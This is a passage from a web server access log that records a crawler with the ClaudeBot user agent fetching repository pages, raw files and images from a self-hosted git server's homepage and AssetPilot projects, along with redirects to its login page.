ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 11102] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates%2Ffavicon.ico" [Client 216.73.216.188] [Length 19195] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages" [Client 216.73.216.188] [Length 23971] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin" [Client 216.73.216.188] [Length 48511] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 10113] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11628] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 10846] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11650] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13754] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12772] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10942] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fnormalizer" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude%2Fsite" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12387] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11632] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10875] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11093] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/images" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 10110] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/images" -[15/Feb/2026:12:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Factivate.fish" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10904] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13440] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 11103] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13016] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 216.73.216.188] [Length 10841] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 24026] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 